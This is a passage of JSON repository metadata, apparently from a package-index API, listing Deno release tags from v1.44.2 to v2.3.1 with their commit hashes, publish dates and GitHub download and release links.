2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denolan